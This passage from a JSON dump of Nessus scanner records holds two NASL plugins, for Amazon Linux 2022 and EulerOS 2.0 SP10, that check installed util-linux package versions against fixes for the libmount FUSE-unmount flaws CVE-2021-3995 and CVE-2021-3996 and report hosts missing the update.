cause a denial of service to applications that use the affected filesystems. (CVE-2021-3996)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-09-06T00:00:00", "type": "nessus", "title": "Amazon Linux 2022 : (ALAS2022-2022-086)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996"], "modified": "2023-10-12T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:libblkid", "p-cpe:/a:amazon:linux:libblkid-debuginfo", "p-cpe:/a:amazon:linux:libblkid-devel", "p-cpe:/a:amazon:linux:libfdisk", "p-cpe:/a:amazon:linux:libfdisk-debuginfo", "p-cpe:/a:amazon:linux:libfdisk-devel", "p-cpe:/a:amazon:linux:libmount", "p-cpe:/a:amazon:linux:libmount-debuginfo", "p-cpe:/a:amazon:linux:libmount-devel", "p-cpe:/a:amazon:linux:libsmartcols", "p-cpe:/a:amazon:linux:libsmartcols-debuginfo", "p-cpe:/a:amazon:linux:libsmartcols-devel", "p-cpe:/a:amazon:linux:libuuid", "p-cpe:/a:amazon:linux:libuuid-debuginfo", "p-cpe:/a:amazon:linux:libuuid-devel", "p-cpe:/a:amazon:linux:python3-libmount", "p-cpe:/a:amazon:linux:python3-libmount-debuginfo", "p-cpe:/a:amazon:linux:util-linux", "p-cpe:/a:amazon:linux:util-linux-core", "p-cpe:/a:amazon:linux:util-linux-core-debuginfo", "p-cpe:/a:amazon:linux:util-linux-debuginfo", "p-cpe:/a:amazon:linux:util-linux-debugsource", "p-cpe:/a:amazon:linux:util-linux-user", "p-cpe:/a:amazon:linux:util-linux-user-debuginfo", "p-cpe:/a:amazon:linux:uuidd", "p-cpe:/a:amazon:linux:uuidd-debuginfo", "cpe:/o:amazon:linux:2022"], "id": "AL2022_ALAS2022-2022-086.NASL", "href": "https://www.tenable.com/plugins/nessus/164755", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2022 Security Advisory ALAS2022-2022-086.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(164755);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/12\");\n\n script_cve_id(\"CVE-2021-3995\", \"CVE-2021-3996\");\n\n script_name(english:\"Amazon Linux 2022 : (ALAS2022-2022-086)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux 2022 host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"It is, therefore, affected by multiple vulnerabilities as referenced in the ALAS2022-2022-086 advisory.\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE\n filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker\n in its string form. An attacker may use this flaw to cause a denial of service to applications that use\n the affected filesystems. (CVE-2021-3995)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other\n users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable\n directory. An attacker may use this flaw to cause a denial of service to applications that use the\n affected filesystems. (CVE-2021-3996)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/AL2022/ALAS-2022-086.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-3995.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-3996.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'dnf update --releasever=2022.0.20220518 util-linux' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:S/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3996\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/05/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/09/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libblkid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libblkid-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libblkid-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libfdisk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libfdisk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libfdisk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libmount\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libmount-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libmount-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libsmartcols\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libsmartcols-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libsmartcols-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libuuid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libuuid-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libuuid-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python3-libmount\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python3-libmount-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux-core-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux-user\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux-user-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:uuidd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:uuidd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2022\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nvar os_ver = pregmatch(pattern: \"^AL(A|\\d+|-\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nvar os_ver = os_ver[1];\nif (os_ver != \"-2022\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2022\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar pkgs = [\n {'reference':'libblkid-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-debuginfo-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-debuginfo-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-debuginfo-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-devel-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-devel-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-devel-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-debuginfo-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-debuginfo-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-debuginfo-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-devel-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-devel-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-devel-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-debuginfo-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-debuginfo-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-debuginfo-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-devel-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-devel-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-devel-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-debuginfo-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-debuginfo-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-debuginfo-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-devel-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-devel-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-devel-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-debuginfo-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-debuginfo-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-debuginfo-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-devel-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-devel-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-devel-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-debuginfo-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-debuginfo-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-debuginfo-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-core-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-core-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-core-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-core-debuginfo-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-core-debuginfo-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-core-debuginfo-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debuginfo-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debuginfo-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debuginfo-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debugsource-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debugsource-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debugsource-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-debuginfo-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-debuginfo-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-debuginfo-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-debuginfo-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-debuginfo-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-debuginfo-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && release && (!exists_check || rpm_exists(release:release, rpm:exists_check))) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libblkid / libblkid-debuginfo / libblkid-devel / etc\");\n}", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-01T15:22:05", "description": "According to the versions of the util-linux packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable directory. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3996)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker in its string form. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3995)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2022-05-06T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP10 : util-linux (EulerOS-SA-2022-1668)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996"], "modified": "2023-10-30T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:libblkid", "p-cpe:/a:huawei:euleros:libfdisk", "p-cpe:/a:huawei:euleros:libmount", "p-cpe:/a:huawei:euleros:libsmartcols", "p-cpe:/a:huawei:euleros:libuuid", "p-cpe:/a:huawei:euleros:util-linux", "p-cpe:/a:huawei:euleros:util-linux-user", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2022-1668.NASL", "href": "https://www.tenable.com/plugins/nessus/160658", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(160658);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/30\");\n\n script_cve_id(\"CVE-2021-3995\", \"CVE-2021-3996\");\n\n script_name(english:\"EulerOS 2.0 SP10 : util-linux (EulerOS-SA-2022-1668)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the util-linux packages installed, the EulerOS installation on the remote host is affected\nby the following vulnerabilities :\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other\n users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable\n directory. An attacker may use this flaw to cause a denial of service to applications that use the\n affected filesystems. (CVE-2021-3996)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE\n filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker\n in its string form. An attacker may use this flaw to cause a denial of service to applications that use\n the affected filesystems. (CVE-2021-3995)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security\nadvisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional\nissues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2022-1668\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f293e501\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected util-linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:S/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3996\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/05/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/05/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/05/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libblkid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libfdisk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libmount\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libsmartcols\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libuuid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:util-linux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:util-linux-user\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nvar uvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP10\");\n\nvar sp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(10)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP10\");\n\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP10\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nvar flag = 0;\n\nvar pkgs = [\n \"libblkid-2.35.2-2.h23.eulerosv2r10\",\n \"libfdisk-2.35.2-2.h23.eulerosv2r10\",\n \"libmount-2.35.2-2.h23.eulerosv2r10\",\n \"libsmartcols-2.35.2-2.h23.eulerosv2r10\",\n \"libuuid-2.35.2-2.h23.eulerosv2r10\",\n \"util-linux-2.35.2-2.h23.eulerosv2r10\",\n \"util-linux-user-2.35.2-2.h23.eulerosv2r10\"\n];\n\nforeach (var pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"10\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"util-linux\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, 